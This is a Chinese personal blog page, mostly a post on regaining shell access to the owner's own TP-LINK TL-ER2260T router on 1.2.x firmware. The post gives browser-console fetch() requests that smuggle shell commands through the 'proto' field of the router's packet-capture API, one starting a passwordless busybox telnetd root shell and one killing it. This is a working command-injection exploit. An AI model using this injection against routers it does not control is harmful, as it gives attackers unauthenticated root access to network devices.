Paulzzh

一个过期东方苟的博客


Explore Me
Paulzzh
Paulzzh
一个过期东方苟的博客
12
4
20
© Paulzzh 2016-2025
Theme Candy-Rebirth By Archeb
东方Project随机图片API[置顶]
接口地址点击获得随机图片自己做的随机图片api,收录4W+张图片,虽然服务器在国外但是速度依然很快,
日常
6年前 · Paulzzh
TP-LINK TL-ER2260T 1.2.x 固件开启 telnet
曾经不懂事升级了 1.1.x 后再也找不回来的 SSH,现在回来了首先打开你的浏览器,登录路由器管理
折腾
1天前 · Paulzzh
東方香霖堂
摘录 Paulzzh · 6年前
这三本书与我手头的十二本合在一起共十五本,恐怕这十五本正好是一套。外部世界的式神果然和幻想乡是一样的。在电脑知识中F代表十五,F包含了一切,当所有东西成为F的时候它就有了最大值——我曾在一本书上读到过这样的内容。
异想穴签到200天
已经肝了这么久了吗。。我怎么不知道
日常
6年前 · Paulzzh
玉灵宫小玉图鉴了解一下
https://www.paulzzh.com/touhou/grk/
日常
6年前 · Paulzzh
修好了返回顶部插件。。
嗯。 感谢插件作者右下角那只就是 <script type="text/jav
日常
6年前 · Paulzzh
TP-LINK TL-ER2260T 1.2.x 固件开启 telnet
折腾 Paulzzh · 1天前
曾经不懂事升级了 1.1.x 后再也找不回来的 SSH,现在回来了

首先打开你的浏览器,登录路由器管理页,然后按 F12
当前最新固件 1.2.8 版本可用,可用版本范围未知请自行尝试!

登录.png

然后粘贴下面这段代码到控制台,按回车执行,自行修改 url 为自己管理页地址

(主题自带的代码块好像有点 bug ,如果显示很难看的话可以尝试刷新网页)

fetch("http://192.168.0.1/stok="+localStorage.getItem("token")+"/ds", {
  "headers": {
    "accept": "text/plain, */*; q=0.01",
    "accept-language": "zh-CN,zh;q=0.9",
    "content-type": "application/json; charset=UTF-8",
    "x-requested-with": "XMLHttpRequest"
  },
  "referrer": "http://192.168.0.1/",
  "body": JSON.stringify({
    "method": "do",
    "capture": {
      "start": {
        "interfaces": "ALL",
        "direction": [
          "RX",
          "TX"
        ],
        "time": "1",
        "src_ip_mask": "192.168.0.1%2F32",
        "src_ip": "192.168.0.1",
        "src_mask": "32",
        "dst_ip_mask": "",
        "dst_ip": "",
        "sport": "",
        "dport": "",
        "proto": "&(/bin/busybox telnetd -l /bin/sh)"
      }
    }
  }),
  "method": "POST",
  "mode": "cors",
  "credentials": "omit"
});

然后除了返回一个 Promise {} 以外应该无事发生
接下来打开你的 PUTTY ,选中 TELNET,输入你的路由器ip 应该就能连上了!没有密码

putty.png
telnet.png

接下来想干什么都可以,你的路由器已经是你的了,可以参考之前 1.0.x 固件的 SSH 玩机教程,一样的。

但是这个 TELNET 没有密码,谁都能上可太不安全了,用完了记得关:

粘贴下面这段代码到控制台 关闭 TELNET

fetch("http://192.168.0.1/stok="+localStorage.getItem("token")+"/ds", {
  "headers": {
    "accept": "text/plain, */*; q=0.01",
    "accept-language": "zh-CN,zh;q=0.9",
    "content-type": "application/json; charset=UTF-8",
    "x-requested-with": "XMLHttpRequest"
  },
  "referrer": "http://192.168.0.1/",
  "body": JSON.stringify({
    "method": "do",
    "capture": {
      "start": {
        "interfaces": "ALL",
        "direction": [
          "RX",
          "TX"
        ],
        "time": "1",
        "src_ip_mask": "192.168.0.1%2F32",
        "src_ip": "192.168.0.1",
        "src_mask": "32",
        "dst_ip_mask": "",
        "dst_ip": "",
        "sport": "",
        "dport": "",
        "proto": "&(kill $(ps|grep '[/]bin/busybox telnetd'|awk '{print $1}'))"
      }
    }
  }),
  "method": "POST",
  "mode": "cors",
  "credentials": "omit"
});

或者在 TELNET 里自己执行 kill $(ps|grep '[/]bin/busybox telnetd'|awk '{print $1}' 之类的

总之把 TELNET 给 KILL 掉就行了

彩蛋:
gpt.png

  评论

    • 您正在回复给 Poi